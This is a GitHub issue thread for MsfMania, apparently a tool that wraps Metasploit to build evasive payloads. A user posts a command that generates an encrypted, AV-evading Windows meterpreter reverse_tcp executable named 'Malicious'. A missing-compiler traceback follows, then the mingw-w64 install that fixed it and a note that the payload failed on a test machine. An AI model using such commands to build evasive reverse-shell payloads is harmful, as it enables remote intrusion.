Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Failed to create Payload #13

Open
Huibuh2010 opened this issue Sep 2, 2021 · 1 comment
Open

Failed to create Payload #13

Huibuh2010 opened this issue Sep 2, 2021 · 1 comment

Comments

@Huibuh2010
Copy link

Hey,

what do i wrong?

python3 MsfMania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -lh 192.168.0.10 -lp 1234 -o Malicious -it local --hash md5

[+] Shellcode generated.

[+] Shellcode encrypted.

[+] Evasion code added.

sh: 1: x86_64-w64-mingw32-windres: not found
[+] File compiled and stripped.

Traceback (most recent call last):
File "/home/kali/Downloads/MsfMania/MsfMania.py", line 253, in
original_file_size = check_file_size()
File "/home/kali/Downloads/MsfMania/MsfMania.py", line 186, in check_file_size
fs = path.getsize(filename)
File "/usr/lib/python3.9/genericpath.py", line 50, in getsize
return os.stat(filename).st_size
FileNotFoundError: [Errno 2] No such file or directory: 'output/Malicious.exe'

@Huibuh2010
Copy link
Author

Huibuh2010 commented Sep 2, 2021

apt install mingw-w64 -y

was the key, sry

but on Test Machine didnt work the Payload.

[-] Exploit failed: Rex::RuntimeError Powershell command length is greater than the command line maximum (8192 characters)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant